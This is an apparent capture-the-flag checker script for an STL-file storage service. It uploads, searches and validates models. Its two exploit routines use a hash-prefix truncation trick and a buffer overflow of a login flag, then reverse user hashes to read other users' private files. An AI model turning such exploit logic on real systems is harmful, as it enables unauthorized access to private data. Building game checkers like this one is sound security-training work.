#!/usr/bin/env python3 import logging import math import os import random import re import struct import subprocess import time import numpy as np logging.getLogger("_curses").setLevel(logging.CRITICAL) from asyncio import StreamReader, StreamWriter from asyncio.exceptions import TimeoutError from io import BytesIO from logging import LoggerAdapter from typing import Any, Optional, Union, cast from enochecker3 import ( AsyncSocket, ChainDB, DependencyInjector, Enochecker, ExploitCheckerTaskMessage, GetflagCheckerTaskMessage, GetnoiseCheckerTaskMessage, InternalErrorException, MumbleException, PutflagCheckerTaskMessage, PutnoiseCheckerTaskMessage, ) from enochecker3.utils import FlagSearcher, assert_in from stl import mesh rand = random.SystemRandom() generic_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" script_path = os.path.dirname(os.path.realpath(__file__)) extra_models = [] for path in os.listdir(f"{script_path}/models"): if path.endswith(".stl"): extra_models.append(f"{script_path}/models/{path}") assert len(extra_models) > 0 wordlist = [w for w in open(f"{script_path}/wordlist.txt").read().split() if w != ""] prompt = b"\r$ " exploit_0_file_prefix = b""" solid test\xff""" exploit_0_file_suffix = b""" facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid """ checker = Enochecker("stldoctor", 9090) app = lambda: checker.app async def timed(promise: Any, logger: LoggerAdapter, ctx: str) -> Any: logger.debug("START: {}".format(ctx)) start = time.time() result = await promise end = time.time() logger.debug("DONE: {} (took {:.3f} seconds)".format(ctx, end - start)) return result class Session: def __init__(self, socket: AsyncSocket, logger: LoggerAdapter) -> None: socket_tuple = cast(tuple[StreamReader, StreamWriter], socket) self.reader = socket_tuple[0] self.writer = socket_tuple[1] self.logger = logger self.closed = False async def __aenter__(self) -> "Session": self.logger.debug("Preparing session") await self.prepare() return self async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None: self.logger.debug("Closing session") await self.close() async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes: try: ctxstr = f"readuntil {target!r}" if ctx is None else ctx data = await timed(self.reader.readuntil(target), self.logger, ctx=ctxstr) msg = f"read: {data[:100]!r}{'..' if len(data) > 100 else ''}" self.logger.debug(msg) return data except TimeoutError: self.logger.critical(f"Service timed out while waiting for {target!r}") raise MumbleException("Service took too long to respond") async def readline(self, ctx: Optional[str] = None) -> bytes: return await self.readuntil(b"\n", ctx=ctx) async def read(self, n: int, ctx: Optional[str] = None) -> bytes: try: ctxstr = f"reading {n} bytes" if ctx is None else ctx data = await timed(self.reader.readexactly(n), self.logger, ctx=ctxstr) msg = f"read: {data[:60]!r}{'..' if len(data) > 60 else ''}" self.logger.debug(msg) return data except TimeoutError: self.logger.critical(f"Service timed out while reading {n} bytes") raise MumbleException("Service took too long to respond") async def drain(self) -> None: await self.writer.drain() def write(self, data: bytes) -> None: msg = f"write: {data[:60]!r}{'..' if len(data) > 60 else ''}" self.logger.debug(msg) self.writer.write(data) async def prepare(self) -> None: await self.readuntil(prompt) async def exit(self) -> None: if self.closed: return self.write(b"exit\n") await self.drain() await self.readuntil(b"bye!") await self.close() async def close(self) -> None: if self.closed: return self.closed = True self.writer.close() await self.writer.wait_closed() @checker.register_dependency def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session: return Session(socket, logger) def includes_all(resp: bytes, targets: list[bytes]) -> bool: for m in targets: if m not in resp: return False return True def includes_any(resp: bytes, targets: list[bytes]) -> bool: for m in targets: if m in resp: return True return False def nnt(ino: Optional[tuple[bytes, bytes]]) -> tuple[bytes, bytes]: assert ino is not None return ino def nnb(ino: Optional[bytes]) -> bytes: assert ino is not None return ino def randbool() -> bool: return rand.randint(0, 1) == 1 def leetify(clean: str) -> str: conv = { "O": "0", "l": "1", "I": "1", "Z": "2", "E": "3", "A": "4", "S": "5", "G": "6", "T": "7", } out = [c.upper() if randbool() else c for c in clean.lower()] return "".join([conv[c] if c in conv else c for c in out]) def fakeid(minlen: int = 25, maxlen: int = 50) -> bytes: choice = rand.randint(0, 2) if choice == 0: # most random without hurting parsing idlen = rand.randint(minlen, maxlen) return bytes([rand.randint(33, 127) for i in range(idlen)]) elif choice == 1: # a cat walking across the keyboard idlen = rand.randint(minlen, maxlen) alph = b"0123456789abcdefghijklmopqrstuvwxyz" return bytes([rand.choice(alph) for i in range(idlen)]) else: # a hacker band name idstr = b"" while len(idstr) < minlen: word = rand.choice(wordlist) if idstr != b"": idstr += b"-" idstr += leetify(word).encode() idstr += b"-" + leetify(rand.choice(wordlist)).encode() return idstr[:maxlen] def fakeids(n: int) -> list[bytes]: return [fakeid() for i in range(n)] def approx_equal(f1: float, f2: float, precision: int = 2) -> bool: return round(f1, precision) == round(f2, precision) def reverse_hash(hashstr: str) -> bytes: data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1] if data == b"": raise InternalErrorException(f"Failed to find hash preimage of {hashstr!r}") return data def parse_int(intstr: Union[str, bytes]) -> Optional[int]: try: return int(intstr) except: return None def parse_float(floatstr: Union[str, bytes]) -> Optional[float]: try: return float(floatstr) except: return None def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool: return len([v for v in data if v not in alph]) == 0 def assert_match(data: bytes, pattern: bytes, raiser: Any) -> bytes: rem = re.search(pattern, data) if rem is None: raise raiser(f"Expected pattern {pattern!r} to match {data!r}") if len(rem.groups()) > 0: return rem.group(1) return rem.group(0) def genfile_ascii(solidname: bytes, malformed: bool = None) -> bytes: # Generate a valid ascii STL file or one that is malformed in a # way that it can't be interpreted by the service, but might succeed # with typical stl parsing libraries (as a means to identify them) indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))]) facet_count = rand.randint(4, 30) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" for fi in range(facet_count): # MALFORM 1: prefix keyword if malformed == 1: content += indent * 1 + b"facet norm" else: content += indent * 1 + b"facet normal " vs = [[rand.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" # MALFORM 2: too many spaces if malformed == 2: content += indent * 2 + b"outer loop\n" else: content += indent * 2 + b"outer loop\n" for i in range(3): content += ( indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" ) content += indent * 2 + b"endloop\n" content += indent + b"endfacet\n" # MALFORM 3: different endsolid name if malformed == 3: content += b"endsolid end\n" if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(solidname: bytes, malformed: bool = None) -> bytes: # Generate a valid binary STL file or one that is malformed in a # way that it can't be interpreted by the service, but might succeed # with typical stl parsing libraries (as a means to identify them) facet_count = rand.randint(4, 30) if len(solidname) > 78: raise InternalErrorException( "Solidname to embed in header is larger than header itself" ) if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 # MALFORM 1: specify more facets than are in the file if malformed == 1: content += struct.pack(" bytes: if filetype == "ascii": return genfile_ascii(solidname, malformed=malformed) elif filetype == "bin": return genfile_bin(solidname, malformed=malformed) elif filetype == "garbage": return bytes([rand.randint(0, 255) for i in range(rand.randint(100, 600))]) else: raise InternalErrorException("Invalid file type supplied") def getfile(filetype: str) -> tuple[bytes, bytes]: if filetype == "ascii": if rand.randint(0, 20) >= 5: solidname = fakeid() stlfile = genfile(solidname, "ascii") else: model = rand.choice([v for v in extra_models if v.endswith("-ascii.stl")]) stlfile = open(model, "rb").read() solidname = fakeid() stlfile = stlfile.replace(b"OpenSCAD_Model", solidname) else: if rand.randint(0, 20) >= 5: solidname = fakeid() stlfile = genfile(solidname, "ascii") else: model = rand.choice([v for v in extra_models if v.endswith("-bin.stl")]) stlfile = open(model, "rb").read() solidname = fakeid(minlen=14, maxlen=14) stlfile = b"#" + solidname + stlfile[15:] # replaces b"OpenSCAD Model\n" return stlfile, solidname def parse_stlinfo(stlfile: bytes) -> Any: fakefile = BytesIO() fakefile.write(stlfile) fakefile.seek(0) try: name, data = mesh.Mesh.load(fakefile) meshinfo = mesh.Mesh(data, True, name=name, speedups=True) # type: ignore except Exception as e: raise InternalErrorException(f"Unable to parse generated STL file: {e}") bmin = [math.inf for i in range(3)] bmax = [-math.inf for i in range(3)] if len(meshinfo.points) == 0: raise InternalErrorException("Parsed STL mesh has 0 points!") for p in meshinfo.points: for k in range(3): for i in range(3): bmin[k] = min(bmin[k], float(p[3 * i + k])) bmax[k] = max(bmax[k], float(p[3 * i + k])) info = { "points": meshinfo.points, "bb_origin": bmin, "bb_size": [bmax[i] - bmin[i] for i in range(3)], "size": len(stlfile), "triangle_count": len(meshinfo.points), } return info async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]: try: return await db.get(key) except KeyError: raise MumbleException( "Could not retrieve necessary info for service interaction" ) # SERVICE FUNCTIONS # async def do_auth( session: Session, authstr: bytes, check: bool = True, newuser: bool = True ) -> Optional[bytes]: # Login with authstr session.write(b"auth\n") session.write(authstr + b"\n") await session.drain() # Check for errors resp = await session.readuntil(prompt, ctx="reading auth response") if resp == b"ERR:": if check: session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}") raise MumbleException("Authentication not working properly") return None # Also check success message try: userid = resp.split(b"!", 1)[0].split(b"Logged in with ID ", 1)[1] except: session.logger.critical(f"Login with pass {authstr!r} failed:\n{resp!r}") raise MumbleException("Authentication not working properly") # Check wether new user is_newuser = b"Welcome back" not in resp if is_newuser != newuser: if check: if newuser: session.logger.critical("Unexpectedly, user dir exists already!") else: session.logger.critical("Unexpectedly, user dir doesnt exist!") raise MumbleException("Authentication not working properly") return None session.logger.debug(f"Logged in as user: {userid!r}") return userid async def do_list(session: Session, check: bool = True) -> Optional[bytes]: session.write(b"list\n") await session.drain() # Check for errors resp = await session.readuntil(prompt, ctx="reading list response") if b"ERR:" in resp and b">> " not in resp: if check: session.logger.critical(f"Failed to list private files:\n{resp!r}") raise MumbleException("File listing not working properly") return None return resp async def do_upload( session: Session, modelname: bytes, stlfile: bytes, check: bool = True, ) -> Optional[bytes]: session.logger.debug(f"Uploading model with name {modelname!r}") # start upload and enter name session.write(b"upload\n") session.write(modelname + b"\n") await session.drain() # check for error with name await session.readuntil(b"name: ") resp = await session.read(4, ctx="checking for err response") if resp == b"ERR:": resp += await session.readuntil(prompt) if check: session.logger.critical(f"Failed during name check: {resp!r}") raise MumbleException("File upload not working properly") return None # write size and contents in together await session.readuntil(b"size: ") session.write(f"{len(stlfile)}\n".encode()) session.write(stlfile) await session.drain() # check for error with size resp = await session.read(4, ctx="checking for err response") if resp == b"ERR:": resp += await session.readuntil(prompt) if check: session.logger.critical(f"Failed during size check: {resp!r}") raise MumbleException("File upload not working properly") return None # checker for error with file await session.readuntil(b"listening..\n") resp = await session.readline() if b"ERR:" in resp: if check: session.logger.critical(f"Failed during stl parsing: {resp!r}") raise MumbleException("File upload not working properly") await session.readuntil(prompt) return None # parse returned id try: modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1] if modelid == b"": raise Exception except: session.logger.critical(f"Invalid size during upload:\n{resp!r}") raise MumbleException("File upload not working properly") session.logger.debug(f"Uploaded model with id {modelid!r}") await session.readuntil(prompt, ctx="waiting for prompt") return modelid async def do_search( session: Session, modelname: bytes, download: bool = False, check: bool = True, ) -> Optional[tuple[bytes, bytes]]: session.logger.debug(f"Retrieving model with name {modelname!r}") # get possible hashes session.write(b"search " + modelname + b"\n") await session.drain() # chck for error with search query resp = await session.read(4) if resp == b"ERR:": resp += await session.readuntil(prompt) if check: session.logger.critical( f"Failed to retrieve model {modelname!r}:\n{resp!r}" ) raise MumbleException("File search not working properly") return None # collect results resp += await session.readuntil(b"quit]: ") try: resp = resp.split(b">")[0] except: session.logger.critical('Search response missing b">" delim') raise MumbleException("File search not working properly") results = [l.strip() for l in resp.split(b"\n") if l.strip() != b""] # request most recent result (later in index file) session.write(results[-1] + b"\n") session.write(b"y\n" if download else b"n\n") await session.drain() # check for error in hash provided resp = await session.read(4) if resp == b"ERR:": # cleanup download y/n interpreted as command await session.readuntil(prompt) if check: session.logger.critical(f"Error selecting file: {results[0]!r}") raise MumbleException("File search not working properly") return None fileinfo = resp + await session.readuntil( b"================== \n", ctx="reading stl info" ) stlfile = b"" if download: # Parse file contents await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)") resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)") resp = resp[:-3] size = parse_int(resp) if size is None: raise MumbleException(f"Invalid download size: {resp!r}") session.logger.debug(f"Download size: {size}") stlfile = await session.read(size, ctx="reading stl contents") # only one result session.write(b"q\n") await session.drain() # cleanup.. await session.readuntil(prompt) return fileinfo, stlfile # CHECK WRAPPERS # async def check_listed(session: Session, includes: list[bytes]) -> bytes: resp = nnb(await do_list(session, check=True)) if not includes_all(resp, includes): session.logger.critical(f"Failed to find {includes} in listing:\n{resp!r}") raise MumbleException("File listing not working properly") return resp async def check_not_listed( session: Session, excludes: list[bytes], fail: bool = False, ) -> Optional[bytes]: resp = await do_list(session, check=False) if resp is not None: if fail: session.logger.critical(f"Expected list to fail, but returned:\n{resp!r}") raise MumbleException("File listing not working properly") if includes_any(resp, excludes): session.logger.critical( f"Unexpectedly found one of {excludes} in listing:\n{resp!r}" ) raise MumbleException("File listing not working properly") elif not fail: session.logger.critical(f"list failed unexpectedly:\n{resp!r}") raise MumbleException("File listing not working properly") return resp async def check_in_search( session: Session, modelname: bytes, includes: list[bytes], download: bool = False, ) -> tuple[bytes, bytes]: resp = nnt(await do_search(session, modelname, download, check=True)) if not includes_all(resp[0] + resp[1], includes): session.logger.critical( f"Retrieved info for {modelname!r} is missing {includes}: {resp[0]+resp[1]!r}" ) raise MumbleException("File search not working properly") return resp async def check_not_in_search( session: Session, modelname: bytes, excludes: list[bytes], download: bool = False, fail: bool = False, ) -> Optional[tuple[bytes, bytes]]: resp = await do_search(session, modelname, download, check=False) if resp is not None: combined = resp[0] + resp[1] if fail: session.logger.critical( "Search for {modelname!r} succeeded unexpectedly:\n{combined!r}" ) raise MumbleException("File search not working properly") if includes_any(combined, excludes): session.logger.critical( f"Unexpectedly {modelname!r} info contains one of {excludes}: {combined!r}" ) raise MumbleException("File search not working properly") elif not fail: session.logger.critical(f"Search for {modelname!r} failed unexpectedly") raise MumbleException("File search not working properly") return resp def check_hash(hashstr: bytes) -> None: if not has_alph(hashstr, b"0123456789abcdef"): raise MumbleException("Invalid model hash format returned") def check_stlinfo( logger: LoggerAdapter, resp: bytes, ref_info: Any, ref_modelid: Optional[bytes] = None, ref_modelname: Optional[bytes] = None, ref_solidname: Optional[bytes] = None, ) -> None: def logthrow(msg: str) -> None: logger.critical(msg) raise MumbleException("STL parsing not working properly") size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException)) if not size or size != ref_info["size"]: logthrow( f"STL info returned no / invalid file size: {size} != {ref_info['size']}" ) triangle_count = parse_int( assert_match(resp, b"Triangle Count: (.*)\n", MumbleException) ) if not triangle_count or triangle_count != ref_info["triangle_count"]: logthrow( f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}" ) bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException) bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")] for i in range(3): val = bb_size[i] if val is None: logthrow(f"STL info returned invalid bounding box size: {bb_size_str!r}") elif not approx_equal(val, ref_info["bb_size"][i]): logthrow( f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}" ) bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException) bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")] for i in range(3): val = bb_origin[i] if val is None: logthrow( f"STL info returned invalid bounding box origin: {bb_origin_str!r}" ) elif not approx_equal(val, ref_info["bb_origin"][i]): logthrow( f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}" ) triangle_count = parse_int( assert_match(resp, b"Triangle Count: (.*)\n", MumbleException) ) if triangle_count is None or triangle_count != ref_info["triangle_count"]: logthrow( f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}" ) if ref_modelname: modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException) if modelname != ref_modelname: logthrow(f"Got modelname {modelname!r}, expected {ref_modelname!r}") if ref_modelid: modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException) if modelid != ref_modelid: logthrow(f"Got modelid {modelid!r}, expected {ref_modelid!r}") if ref_solidname: solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException) if solidname != ref_solidname: logthrow(f"Got solidname {solidname!r}, expected {ref_solidname!r}") # TEST METHODS # async def test_good_upload(di: DependencyInjector, filetype: str) -> None: modelname = fakeid() stlfile, solidname = getfile(filetype) ref = parse_stlinfo(stlfile) # Upload file, get it with search, verify returned info session = await di.get(Session) modelid = nnb(await do_upload(session, modelname, stlfile, check=True)) expected = [modelname, solidname, stlfile, modelid] info, stl = await check_in_search(session, modelname, expected, download=True) check_stlinfo( session.logger, info, ref, ref_modelname=modelname, ref_modelid=modelid, ref_solidname=solidname, ) async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None: modelname, solidname = fakeids(2) stlfile = genfile(solidname, filetype, malformed=variant) # Ensure a malformed file causes an error session = await di.get(Session) resp = await do_upload(session, modelname, stlfile, check=False) if resp is not None: session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}") raise MumbleException("Upload validation not working properly") async def test_hash_collision(di: DependencyInjector) -> None: # See if using a random string we hit a hash collision for search / auth session = await di.get(Session) sresp = await do_search(session, fakeid(), download=False, check=False) if sresp is not None: session.logger.critical("File search succeeded on random file") raise MumbleException("Hash function not working properly") aresp = await do_auth(session, fakeid(), check=False, newuser=False) if aresp is not None: session.logger.critical("Auth succeeded for user with random str") raise MumbleException("Hash function not working properly") # CHECKER METHODS # @checker.putflag(0) async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> str: modelname = fakeid() stlfile = genfile(task.flag.encode(), "ascii") db = await di.get(ChainDB) # Generate a file with flag in solidname and upload it (unregistered, ascii) session = await di.get(Session) modelid = nnb(await do_upload(session, modelname, stlfile, check=True)) await db.set("info", (modelname, modelid)) return "Model {}.. is kinda sus".format(modelid[:10].decode()) @checker.putflag(1) async def putflag_private( task: PutflagCheckerTaskMessage, di: DependencyInjector ) -> str: modelname, authstr = fakeids(2) stlfile = genfile(task.flag.encode(), "bin") db = await di.get(ChainDB) # Generate a file with flag in solidname and upload it (registered, bin) session = await di.get(Session) userid = nnb(await do_auth(session, authstr, check=True, newuser=True)) modelid = nnb(await do_upload(session, modelname, stlfile, check=True)) await db.set("info", (modelname, modelid, authstr)) return "User {}.. is kinda sus".format(userid[:10].decode()) @checker.getflag(0) async def getflag_unregistered( task: GetflagCheckerTaskMessage, di: DependencyInjector ) -> None: db = await di.get(ChainDB) modelname, modelid = await getdb(db, "info") # Search for flag file and verify flag is included session = await di.get(Session) sresp = nnt(await do_search(session, modelname, download=True, check=True)) assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag") @checker.getflag(1) async def getflag_registered( task: GetflagCheckerTaskMessage, di: DependencyInjector ) -> None: db = await di.get(ChainDB) modelname, modelid, authstr = await getdb(db, "info") # Authenticate, get flag via search and list session = await di.get(Session) await do_auth(session, authstr, check=True, newuser=False) sresp = nnt(await do_search(session, modelname, download=True, check=True)) assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag") lresp = nnb(await do_list(session, check=True)) assert_in(task.flag.encode(), lresp, "Failed to retrieve flag") @checker.putnoise(0) async def putnoise_unregistered( task: PutnoiseCheckerTaskMessage, di: DependencyInjector ) -> None: modelname, solidname = fakeids(2) stlfile, solidname = getfile("ascii" if randbool() else "bin") db = await di.get(ChainDB) # Upload file for later checking session = await di.get(Session) modelid = await do_upload(session, modelname, stlfile, check=True) await db.set("info", (modelid, modelname, solidname, stlfile)) @checker.putnoise(1) async def putnoise_registered( task: PutnoiseCheckerTaskMessage, di: DependencyInjector ) -> None: modelname, solidname, authstr = fakeids(3) stlfile, solidname = getfile("ascii" if randbool() else "bin") db = await di.get(ChainDB) # Upload private file for later checking session = await di.get(Session) await do_auth(session, authstr, check=True, newuser=True) modelid = await do_upload(session, modelname, stlfile, check=True) await db.set("info", (modelid, modelname, solidname, stlfile, authstr)) @checker.getnoise(0) async def getnoise_unregistered( task: GetnoiseCheckerTaskMessage, di: DependencyInjector ) -> None: db = await di.get(ChainDB) modelid, modelname, solidname, stlfile = await getdb(db, "info") ref = parse_stlinfo(stlfile) session = await di.get(Session) # check that search works on persisted file expected = [modelname, solidname, stlfile, modelid] info, stl = await check_in_search(session, modelname, expected, download=True) # check that persisted file info is still valid check_stlinfo( session.logger, info, ref, ref_modelname=modelname, ref_modelid=modelid, ref_solidname=solidname, ) @checker.getnoise(1) async def getnoise_registered( task: GetnoiseCheckerTaskMessage, di: DependencyInjector ) -> None: db = await di.get(ChainDB) modelid, modelname, solidname, stlfile, authstr = await getdb(db, "info") ref = parse_stlinfo(stlfile) session = await di.get(Session) # check that auth works and tells us we are logging in again await do_auth(session, authstr, check=True, newuser=False) # check that search works on persisted file expected = [modelname, solidname, stlfile, modelid] info, stl = await check_in_search(session, modelname, expected, download=True) # check that persisted file info is still valid check_stlinfo( session.logger, info, ref, ref_modelname=modelname, ref_modelid=modelid, ref_solidname=solidname, ) # check that list works on persisted file await check_listed(session, [modelname, modelid + b"-", solidname]) @checker.havoc(0) async def havoc_good_upload_ascii(di: DependencyInjector) -> None: await test_good_upload(di, "ascii") @checker.havoc(1) async def havoc_bad_upload_ascii_v1(di: DependencyInjector) -> None: await test_bad_upload(di, "ascii", 1) @checker.havoc(2) async def havoc_bad_upload_ascii_v2(di: DependencyInjector) -> None: await test_bad_upload(di, "ascii", 2) @checker.havoc(3) async def havoc_bad_upload_ascii_v3(di: DependencyInjector) -> None: await test_bad_upload(di, "ascii", 3) @checker.havoc(4) async def havoc_good_upload_bin(di: DependencyInjector) -> None: await test_good_upload(di, "bin") @checker.havoc(5) async def havoc_bad_upload_bin_v1(di: DependencyInjector) -> None: await test_bad_upload(di, "bin", 1) @checker.havoc(6) async def havoc_bad_upload_bin_v2(di: DependencyInjector) -> None: await test_bad_upload(di, "bin", 2) @checker.havoc(7) async def havoc_bad_upload_bin_v3(di: DependencyInjector) -> None: await test_bad_upload(di, "bin", 3) @checker.havoc(8) async def havoc_bad_upload_garbage(di: DependencyInjector) -> None: await test_bad_upload(di, "garbage", 1) @checker.havoc(9) async def havoc_hash_collision(di: DependencyInjector) -> None: await test_hash_collision(di) @checker.exploit(0) async def exploit_prefix_truncation( task: ExploitCheckerTaskMessage, di: DependencyInjector ) -> bytes: modelname = fakeid() searcher = await di.get(FlagSearcher) # Generate exploit payload using attack_info assert task.attack_info is not None target_prefix = task.attack_info.split()[1][:-2].encode() evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix # Upload evil file session = await di.get(Session) await do_upload(session, modelname, stlfile=evil_file, check=True) await do_search(session, modelname, download=False, check=True) # Retrieve evil file for hash truncation session.write(b"search last\n") await session.drain() resp = await session.readline() if b"ERR:" in resp: raise MumbleException("Searching for cached entry fails!") resp += await session.readuntil(b"[q to quit]: ", ctx="reading search results") filelist = [l.strip() for l in resp.split(b"\n")[:-1] if l.strip() != b""] if len(filelist) == 0: raise MumbleException("Failed to list files through search") # Use it to enumerate other files and grab contents flag = None for fhash in filelist: session.write(fhash + b"\n") session.write(b"n\n") await session.drain() resp = await session.readline() if b"ERR:" in resp: session.logger.critical(f"Failed on selection of file: {resp!r}") raise MumbleException("Failed to retrieve file contents via exploit") resp += await session.readuntil( b"==================", ctx="getting file info (1)" ) resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)") if flag := searcher.search_flag(resp): break # Done! session.write(b"q\n") await session.drain() await session.readuntil(prompt) if flag is not None: return flag raise MumbleException("Exploit for flagstore 1 failed") @checker.exploit(1) async def exploit_hash_overflow( task: ExploitCheckerTaskMessage, di: DependencyInjector ) -> None: searcher = await di.get(FlagSearcher) logger = await di.get(LoggerAdapter) assert task.attack_info is not None target_prefix = task.attack_info.split()[1][:-2].encode() # Overflow loggedin variable session = await di.get(Session) session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") await session.drain() await session.readuntil(prompt, ctx="overflowing loggedin via search") session.write(b"auth\n") await session.drain() resp = await session.readuntil(prompt, ctx="checking auth success") if b"Already logged in!" not in resp: raise MumbleException("Exploit did not set 'loggedin' variable via overflow") # Get private user hashes via 'list' resp = await do_list(session, check=True) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] await session.exit() # Check if there is a flag in the response already # (shouldn't be, enochecker_test will throw an error if this succeeds) if flag := searcher.search_flag(resp): return flag logger.debug(f"Searching for user with prefix: {target_prefix!r}") logger.debug(f"Possible users: {users!r}") # Login as each private user for userhash in users: if not userhash.startswith(target_prefix): continue # Find preimage of user hash authstr = reverse_hash(userhash.decode()) # Authenticate and check if the user is new session = await di.get(Session) logger.debug(f"Trying to login as user: {userhash!r}") if not await do_auth(session, authstr, check=False, newuser=False): await session.exit() # We dont raise an exception, because it could be that user dir was cleaned # up just before we logged in, not necessarily because of an invalid prehash. # If there was a problem with the preimage generation, we wont find a flag and # an exception will be raised later anways... continue # list all private files of user resp = await do_list(session, check=True) await session.exit() # Search for flag in solid names solidnames = b"\n".join( [l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l] ) if flag := searcher.search_flag(solidnames): return flag raise MumbleException("Exploit for flagstore 2 failed") if __name__ == "__main__": checker.run(port=9091)